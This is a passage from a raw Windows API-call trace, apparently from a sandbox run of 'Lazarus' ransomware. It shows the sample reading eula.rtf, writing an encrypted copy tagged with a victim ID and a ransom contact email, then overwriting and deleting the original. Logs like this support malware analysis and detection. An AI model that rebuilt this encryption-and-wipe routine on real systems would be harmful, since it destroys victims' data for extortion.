Context=0x0) returned 1 [0067.299] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.299] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.299] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0067.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x693f0 [0067.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0067.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0067.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0067.299] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="1041", cAlternateFileName="")) returned 1 [0067.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0067.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0067.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0067.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0067.299] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1040\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78110 [0067.299] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.299] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0067.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0067.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0067.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0067.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0067.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0067.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0067.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0067.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0067.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0067.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0067.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0067.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46828 [0067.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0067.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0067.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0067.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0067.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0067.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0067.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0067.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0067.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0067.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0067.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0067.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0067.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71ca0 [0067.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0067.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0067.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0067.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0067.300] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.300] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.300] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.300] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0067.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0067.300] AreFileApisANSI () returned 1 [0067.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1040\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1040\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0067.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0067.300] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.300] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0067.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0067.300] AreFileApisANSI () returned 1 [0067.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0067.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0067.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 36 [0067.301] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0067.301] GetFileType (hFile=0x428) returned 0x1 [0067.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0067.301] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0067.301] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0067.301] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0067.301] CloseHandle (hObject=0x428) returned 1 [0067.301] AreFileApisANSI () returned 1 [0067.301] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0067.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68b30 [0067.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x68b30, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 36 [0067.302] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0067.302] GetFileType (hFile=0x428) returned 0x1 [0067.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b30 | out: hHeap=0x20000) returned 1 [0067.302] CloseHandle (hObject=0x428) returned 1 [0067.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0067.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0067.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0067.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0067.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0067.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0067.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0067.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0067.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0067.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0067.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0067.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0067.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0067.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0067.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0067.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0067.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0067.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0067.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0067.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0067.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0067.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0067.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0067.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0067.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0067.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0067.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0067.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0067.303] AreFileApisANSI () returned 1 [0067.303] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0067.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69490 [0067.303] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x69490, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 36 [0067.303] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1040\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe3b)) returned 1 [0067.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69490 | out: hHeap=0x20000) returned 1 [0067.303] AreFileApisANSI () returned 1 [0067.303] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0067.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0067.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0067.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0067.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0067.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0067.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0067.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0067.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0067.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0067.303] GetLastError () returned 0x0 [0067.303] SetLastError (dwErrCode=0x0) [0067.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4de70 [0067.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8c430 [0067.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b568 [0067.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0067.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5b8 [0067.303] GetLastError () returned 0x0 [0067.303] SetLastError (dwErrCode=0x0) [0067.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0067.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0067.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x694e0 [0067.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0067.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76278 [0067.304] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x694e0 | out: hHeap=0x20000) returned 1 [0067.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0067.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0067.304] AreFileApisANSI () returned 1 [0067.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76278, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0067.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc4) returned 0x51398 [0067.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76278, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=98 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1040\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 98 [0067.304] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0067.422] GetFileType (hFile=0x428) returned 0x1 [0067.422] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0067.422] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0067.422] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0067.422] AreFileApisANSI () returned 1 [0067.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0067.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0067.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 36 [0067.423] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0067.423] GetFileType (hFile=0x420) returned 0x1 [0067.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0067.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a5b0 [0067.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0067.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0067.423] GetLastError () returned 0x0 [0067.423] SetLastError (dwErrCode=0x0) [0067.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0067.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0067.423] GetLastError () returned 0x0 [0067.423] SetLastError (dwErrCode=0x0) [0067.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0067.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0067.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0067.423] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f030*=0xe3b, lpOverlapped=0x0) returned 1 [0067.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0067.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6f0 [0067.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x85fc0 [0067.425] GetLastError () returned 0x0 [0067.425] SetLastError (dwErrCode=0x0) [0067.425] GetLastError () returned 0x0 [0067.425] SetLastError (dwErrCode=0x0) [0067.425] GetLastError () returned 0x0 [0067.425] SetLastError (dwErrCode=0x0) [0067.425] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0067.425] GetLastError () returned 0x0 [0067.425] SetLastError (dwErrCode=0x0) [0067.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb) returned 0x7d6c0 [0067.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5a0 [0067.426] GetLastError () returned 0x0 [0067.426] SetLastError (dwErrCode=0x0) [0067.426] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6f0 | out: hHeap=0x20000) returned 1 [0067.426] WriteFile (in: hFile=0x428, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0xe40, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327ef70*=0xe40, lpOverlapped=0x0) returned 1 [0067.427] GetLastError () returned 0x0 [0067.427] SetLastError (dwErrCode=0x0) [0067.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6c0 | out: hHeap=0x20000) returned 1 [0067.427] GetLastError () returned 0x0 [0067.427] SetLastError (dwErrCode=0x0) [0067.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0067.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0067.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5a0 | out: hHeap=0x20000) returned 1 [0067.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0067.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0067.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0067.427] CloseHandle (hObject=0x428) returned 1 [0067.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0067.428] CloseHandle (hObject=0x420) returned 1 [0067.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0067.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0067.428] AreFileApisANSI () returned 1 [0067.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0067.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69300 [0067.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x69300, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 36 [0067.429] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0067.429] GetFileType (hFile=0x420) returned 0x1 [0067.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0067.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0067.430] GetLastError () returned 0xb7 [0067.430] SetLastError (dwErrCode=0xb7) [0067.430] WriteFile (in: hFile=0x420, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0067.431] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0067.431] CloseHandle (hObject=0x420) returned 1 [0067.431] AreFileApisANSI () returned 1 [0067.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0067.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0067.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 36 [0067.431] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf")) returned 1 [0067.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: 